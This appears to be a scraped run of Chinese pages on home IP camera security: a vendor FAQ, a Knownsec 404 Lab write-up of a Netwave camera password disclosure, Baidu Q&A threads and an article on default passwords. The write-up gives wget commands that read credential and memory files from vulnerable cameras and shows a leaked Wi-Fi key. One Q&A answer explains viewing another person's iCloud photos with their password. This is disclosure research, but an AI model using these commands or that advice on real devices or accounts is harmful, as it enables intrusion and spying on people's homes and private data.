如何查看小蚁摄像头是否被偷窥？官方回应
15:59:44 Loading 编辑：随心
近日，央视新闻的一篇报道让家里安装摄像机的小伙伴人心惶惶。对此，小蚁工程师今天现身讲解，彻底打消小蚁摄像机用户的顾虑。
央视报道称，网络上存在大量聊天群明码标价出售相关破解软件，可以攻破他人家庭摄像头的IP地址，偷窥摄像头拍下的画面，甚至可以操控摄像头。
另据国家质检总局最近监测数据显示，从市场上采集40批次的样品，32批次存在安全隐患，28批次样品数据传输没有加密，20批次初始密码是&弱口令&，这些问题都使得用户监控视频极易泄露或被恶意控制。
小蚁对这类安全问题进行了集中答疑。小蚁表示，小蚁摄像机无任何公开的网络端口，仅能通过官方的APP和PC端进行观看，利用其他如输入IP地址等方法都无法浏览摄像头内容。
其次，新闻中所描述的情况主要是由于账号泄露，而小蚁强制用户使用强口令密码，并支持观看密码设置，极大的保证了用户信息安全。
对于大家关心的&如何知道我们的摄像头有没有被人监视？&小蚁表示会推出账号登陆和摄像头查看功能，记录一目了然。
以下是《小蚁工程师对智能摄像机安全问题的十问十答》全文：
1、小蚁智能摄像机在数据传输过程中有哪些安全保障？
答：小蚁智能摄像机在传输过程中使用了高强度的私有动态加密系统，确保数据传输及存储安全，用户对摄像机的每一次访问都受到加密保护。
2、小蚁在绑定过程中有哪些安防措施？
答：小蚁是首创使用二维码绑定的设备，绑定过程中使用的是服务器随机生成的令牌，无任何默认用户名密码的问题，所以央视质检报告中所提及的&通过弱口令扫描的方式&攻击摄像机对小蚁设备是无效的。
3、央视新闻节目中提到的&弱口令&的问题，请问小蚁智能摄像机在此方面有哪些保护措施？
答：小蚁摄像机无任何预设的用户名密码，所以不存在弱口令问题。在账号方面，小蚁强制用户使用强口令，同时还可以对摄像机设置4位观看密码，保证了用户账号以及视频数据的安全。
4、新闻中曝出有家用智能摄像头被偷窥并出售IP地址的情况，小蚁智能摄像机系统存在这样的漏洞风险么？如何避免？
答：首先小蚁摄像机无任何公开的网络端口，仅能通过官方的APP和PC端进行观看，利用其他如输入IP地址等方法都无法浏览摄像头内容。其次，新闻中所描述的情况主要是由于账号泄露，而小蚁强制用户使用强口令密码，并支持观看密码设置，极大的保证了用户信息安全。
5、如何知道我们的摄像头有没有被人监视？如何查询摄像机的登录记录？
答：小蚁会推出账号登陆和摄像头查看功能，记录一目了然。
6、同一平台内是否可以查看任意用户摄像头的视频？
答：当然不可以，每个用户只能看到自己所拥有的小蚁摄像机的视频内容，小蚁没有搭建支持个人发起直播等相关公共平台。
7、节目中技术员演示攻击摄像机导致画面停止是什么原因？用户应如何避免？
答：节目中技术员演示的操作仅仅造成了画面暂停，画面也没有被替换。出现暂停是因为攻击者利用本地网络对摄像机发起攻击，导致摄像机网络阻塞，无法正常传输视频从而使画面卡住，对用户的正常观看产生影响。因此小蚁并不存在被监控的风险。如果用户采用TF卡存储，会发现所有实时画面都会被记录在TF卡中。
8、在这个演示中，演示者是如何知道摄像头的账号与密码？小蚁摄像机的用户注册信息可否被任意查看？
答：演示中并无任何账号和密码泄露的行为，演示者只是通过摄像机本地网络对摄像机发起攻击，从而阻止摄像机的视频传输，导致APP无法正常观看摄像机内容，小蚁摄像机本身不存在安全漏洞问题。摄像机的视频传输被阻止，会导致用户在APP上看到之前的静止画面，一段时间后，APP会提示用户网络已中断。
小蚁系统中的注册信息都是不可逆加密存储的，任何人都查看不了。只要用户按照要求设置了强密码，并且不泄露该密码，账号就是安全的。
9、数据存储方面，使用本地存储和云存储哪个更安全？
答：小蚁云存储功能采用了高强度加密，更安全。首先，小蚁云存储以阿里云为技术支持，有着充足的网络防御经验；其次，小蚁云存储是实时动态加密上传数据的，且账号之间的云存储是完全独立的，设备账号是一一对应关系，除了自己之外的任何人都无法查看云存储中的视频内容。因此相较于本地存储，用小蚁云存储更安全。
10、在APP和PC端，小蚁都有哪些安全防护措施？
答：小蚁智能摄像机APP和小蚁智能摄像机PC端在访问服务器进行数据交换和更新过程中，使用HTTPS官方证书严格加密。在用户通过小蚁客户端访问小蚁智能摄像机时，会使用动态密码访问加密技术和视频传输加密技术，有效防止摄像机被盗用，加强了安全性。
此外，在APP设置选项中，用户还可以对每个小蚁摄像机设置一个额外的、独立的4位数字观看密码，以达到更高级别的隐私保护。设置后在手机端及电脑端观看视频内容均需要输入密码，被分享的设备也需要知道密码才能正常观看。我是如何通过网络摄像头分析wifi密码的
Author：MyKings(知道创宇404实验室)
看到 exploit-db.com 中报了一个《Netwave IP Camera - Password Disclosure》漏洞, 这个漏洞包含了wifi密码与Web的账号泄露。
顺便使用了 zoomeye 搜索了下全球的这款网络摄像头, 发现用这个还挺多的。
1.1 漏洞分析
wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
wget -qO- http://[HOST]:[PORT]//dev/rom0
wget -qO- http://[HOST]:[PORT]/get_status.cgi
1.1.1 get_status.cgi
会泄露当前网络摄像头的一些配置信息:
var sys_ver='21.37.2.47';
var app_ver='0.0.4.19';
var alias='002voam';
var tz=-28800;
var alarm_status=0;
var ddns_status=0;
var ddns_host='';
var oray_type=0;
var upnp_status=0;
var p2p_status=0;
var p2p_local_port=20409;
var msn_status=0;
var wifi_status=0;
var temperature=0.0;
var humidity=0;
var tridro_error='';
1.1.2 /etc/RT2870STA.dat
这里文件就是一个配置文件, 这里可以得到SSID与wifi密码。
SSID=hang yue office
NetworkType=Infra
AuthMode=WPA2PSK
EncrypType=AES
WPAPSK=hangyuewifi
1.1.3 /proc/kcore
内存的map, 可以直接使用wget下载下来(需要注意这里要把wget进程结束才可以登录)。
2 区域分布
先来看一张使用 ZoomEye 搜索的结果, 可以看到搜索到 315,129 条。
通过筛选分析后 11186 IP中存在包含wifi密码, 其中覆盖了111个国家和地区。
这里近分析了中国香港地区的摄像头:
无wifi密码962个
WEP加密方式728个
WPAPSK加密方式9496个
密码类型统计
纯数字 1807 个
纯字母 1405 个
字母+数字 5585 个
含特殊字符 1001 个
密码用的最多TOP 10
密码长度统计
看的出大众还是使用8位、10位的密码较多。
附上一张香港分析后的图, 红色代表没有密码的wifi, 黄色代表WEP加密方式, 蓝色代表WPAPSK方式。
这个世界范围内存在摄像头密码泄漏的分布图。
这张图示是根据SSID搜索到的一家公司内的IP摄像头截图。
3 参考链接
https://www.seebug.org/vuldb/ssvid-92650
https://www.exploit-db.com/exploits/41236/
本文由 Seebug Paper 发布，如需转载请注明来源。本文地址：苹果手机知道别人id密码能打开对方手机的摄像头么_百度知道
苹果手机知道别人id密码能打开对方手机的摄像头么
我有更好的答案
不可以哦 但是如果知道别人的id密码，可以登录iCloud，对方如果开启了照片备份 就可以在iCloud看到他所有苹果设备里的照片
那我可以帮他下东西吗
不可以的哦 除非你拿到他的iPhone或者iPad
采纳率：63%
为您推荐：
其他类似问题
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。如何获取他人网络监控摄像头的id号_百度知道
如何获取他人网络监控摄像头的id号
我有更好的答案
1、需下载相应的监控软件APP，连接他的网络之后进APP里面搜索就可以了2、拿他的机子看，一般机子上都会有3、如果别人修改了用户名和密码，你是没办法获取的
采纳率：64%
找到对应厂商的软件，连入监控网络，使用软件搜索即可
让别人告诉你
为您推荐：
其他类似问题
您可能关注的内容
网络监控摄像头的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。用户名&密码智能摄像头初始密码不换等同于裸奔
&&&&智能摄像头的安装已经非常简单，找个合适的角度，连上电源和网络，手机登陆客户端，输入摄像机上的账号和密码即可。而智能摄像头的用处无非就是在家里遇到突发事件，可以有据可依，如果让其他人知道自己家的智能摄像头账号和密码，会导致什么后果?
用户名&密码：智能摄像头初始密码不换等同于“裸奔”!
& &讯：相信admin这个词你不陌生吧?很多软件都用这个词来作为默认的用户名啊!比如你家的路由器还有智能摄像头。随着百度、360、小米等互联网企业推出智能摄像头后，越来越多的人购买摄像机为家庭和上铺等场所筑起一道新防线。但不可置否的是，你购买的，初始密码人人皆知，但很多用户并不在意这一点，甚至有些用户称：只要不拍艳照、不拍隐私，初始密码重新设置的问题无所谓。　　可是，智能摄像头初始密码不换，这等同于它在“裸奔”啊!用户名&密码：初始密码不换等同于“裸奔”!　　在目前安防IT化格局已定的态势下，信息安全已经成为众多安防企业时时刻刻都需要面对的难题。在视频监控系统布建时，只有一个办法可以较好地规避网络攻击，就是建立独立专网，与互联网实现物理隔离。但是，智能摄像头可以这样做吗?答案是：不能。　　智能摄像头的安装已经非常简单，找个合适的角度，连上电源和网络，手机登陆客户端，输入摄像机上的账号和密码即可。而智能摄像头的用处无非就是在家里遇到突发事件，可以有据可依，如果让其他人知道自己家的智能摄像头账号和密码，会导致什么后果?　　1、 家庭环境布局：家庭环境布局虽然只是一个小问题，但是可以通过摄像机所拍摄的方位，知道摄像机的位置，使非法入侵人员可以有备而来，甚至可以顺手牵羊带走摄像机;　　2、 家庭情况：什么时候家里有人?有哪些人?他们是谁?如果其他人掌握这些，无非就是对他们说：欢迎随时来我家;　　3、 个人生活与隐私：家，就是可以让自己放心的地方，但是如果自己的一举一动都收到别人的监控，不知这个“家”是否还是“家”?　　但不可置否的是，明知道会有这些结果，仍然有不少人不为所动，抛出一句：只要没有什么艳照即可。在这种情况下，唯一能做好信息安全的只有设备商，那我们就来看看，目前智能家居厂商都有哪些办法?　　1、 二维码：二维码可以说是目前最好的保护措施，很多智能家居设备上，要识别，先扫描二维码，该方式相对安全;　　2、 二维码+旧密码：目前部分安防企业开始启用这种模式。黑客单纯的知道密码是没用的，还得再去扫描二维码，只有两者合一才能生效，否则无法修改;　　3、 字符密码：此类密码最容易破解，破解后可以直接看“生活剧”。　　当然，不管用哪种密码方式，都不能掉以轻心，如果一不小心，家居安防也只能沦落到摆设。 & &相关阅读：
一周资讯排行
每月热点资讯}